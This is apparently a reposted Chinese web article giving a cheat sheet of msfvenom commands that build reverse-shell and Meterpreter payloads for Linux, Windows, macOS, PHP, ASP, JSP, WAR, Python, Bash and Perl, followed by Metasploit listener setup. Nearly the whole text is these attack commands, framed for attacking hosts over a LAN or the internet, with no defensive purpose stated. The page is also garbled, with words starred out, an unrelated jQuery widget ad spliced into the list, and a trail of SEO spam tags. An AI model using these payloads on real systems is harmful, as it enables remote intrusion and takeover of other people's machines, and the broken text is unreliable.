首页 关于我们 成功案例 网络营销 电商设计 新闻中心 联系方式
QQ联系
电话联系
手机联系

收藏Metasploit payload

发布时间:2025-09-05 08:38
发布者:网络
浏览次数:

通常 metasploit 最有用(对于初学者来说被低估)的功能之一是 msfpayload 模块。可以使用此模块创建多个有效负载,它有助于在几乎任何情况下为您提供外壳。对于这些有效负载中的每一个,您都可以进入 msfconsole 并选择exploit/multi/handler。为使用的相关负载运行“设置负载”并配置所有必要的选项(lhost、lport 等)。执行并等待有效负载运行。对于下面的示例,它是不言自明的,但 lhost 应填写您的 ip 地址(如果在网络内进行攻击,则为 lan ip,如果通过 internet 进行攻击,则为 wan ip),并且 lport 应该是您希望重新连接的端口。

Linux

代码语言:j*ascript代码运行次数:0运行复制
msfvenom -p linux / x86 / meterpreter / reverse_tcp LHOST = <您的IP地址>  LPORT = <您要连接的端口>  -f elf > shell.elf

Windows

代码语言:j*ascript代码运行次数:0运行复制
msfvenom -p windows / meterpreter / reverse_tcp LHOST = <您的IP地址>  LPORT = <您要连接的端口>  -f exe > shell.exe

Mac

代码语言:j*ascript代码运行次数:0运行复制
msfvenom -p osx / x86 / shell_reverse_tcp LHOST = <您的 IP 地址>  LPORT = <您要连接的端口>  -f macho > shell.macho

PHP

代码语言:j*ascript代码运行次数:0运行复制
msfvenom -p php / meterpreter_reverse_tcp LHOST = <你的 IP 地址>  LPORT = <你的连接端口>  -f raw > shell.php cat shell.php | pbcopy &&  echo  '<?php'  |  tr  -d  '\n'  > shell.php && pbpaste >> shell.php

ASP

代码语言:j*ascript代码运行次数:0运行复制
msfvenom -p windows / meterpreter / reverse_tcp LHOST = <您的IP地址>  LPORT = <您要连接的端口>  -f asp > shell.asp

JSP

代码语言:j*ascript代码运行次数:0运行复制
msfvenom -p j*a / jsp_shell_reverse_tcp LHOST = <您的IP地址>  LPORT = <您要连接的端口>  -f raw > shell.jsp

War

代码语言:j*ascript代码运行次数:0运行复制
msfvenom -p j*a / jsp_shell_reverse_tcp LHOST = <您的IP地址>  LPORT = <您要连接的端口>  -f war > shell.war

Python

jQuery右侧隐藏收缩在线客服 jQuery右侧隐藏收缩在线客服

jQuery右侧隐藏收缩在线客服是一款默认隐藏悬浮在右侧,鼠标经过滑出的jQuery在线客服代码。

jQuery右侧隐藏收缩在线客服 40 查看详情 jQuery右侧隐藏收缩在线客服 代码语言:j*ascript代码运行次数:0运行复制
msfvenom -p cmd / unix / reverse_python LHOST = <你的 IP 地址>  LPORT = <你要连接的端口>  -f raw > shell.py

Bash

代码语言:j*ascript代码运行次数:0运行复制
msfvenom -p cmd / unix / reverse_bash LHOST = <您的 IP 地址>  LPORT = <您要连接的端口>  -f raw > shell.sh

Perl

代码语言:j*ascript代码运行次数:0运行复制
msfvenom -p cmd / unix / reverse_perl LHOST = <你的 IP 地址>  LPORT = <你要连接的端口>  -f raw > shell.pl

Linux Based Shellcode

代码语言:j*ascript代码运行次数:0运行复制
msfvenom -p linux / x86 / meterpreter / reverse_tcp LHOST = <您的IP地址>  LPORT = <您要连接的端口>  -f  <语言>

Windows Based Shellcode

代码语言:j*ascript代码运行次数:0运行复制
msfvenom -p windows / meterpreter / reverse_tcp LHOST = <您的IP地址>  LPORT = <您要连接的端口>  -f  <语言>

Mac Based Shellcode

代码语言:j*ascript代码运行次数:0运行复制
msfvenom -p osx / x86 / shell_reverse_tcp LHOST = <您的 IP 地址>  LPORT = <您要连接的端口>  -f  <语言>

设置 Metasploit 以接收传入的 shell

代码语言:j*ascript代码运行次数:0运行复制
use exploit/multi/handlerset PAYLOAD <Payload name>set LHOST <LHOST value>set LPORT <LPORT value>set ExitOnSession falseexploit -j -z

完成所需的值后,以下命令将执行您的处理程序 – 'msfconsole -L -r '

收藏Metasploit payload

以上就是收藏Metasploit payload的详细内容,更多请关注php中文网其它相关文章!


# shell  # php  # linux  # javascript  # java  # windows  # mac  # win  # 您的  # 您要  # 在线客服  # 任务栏  # 你要  # 如何解决  # 则为  # 不可用  # 重命名  # 鼠标  # 浙江互联网营销推广渠道有哪些  # 万年公司网站建设  # 营销网站怎么推广产品  # 湘潭网站建设诚信合作  # 展览会营销推广文案模板  # 渭南网站建设定制开发  # 广丰社区网站优化  # 怎么样让自己的qq群在关键词上排名高  # 荣获十佳政府网站建设  # 高埗服装网站优化的方案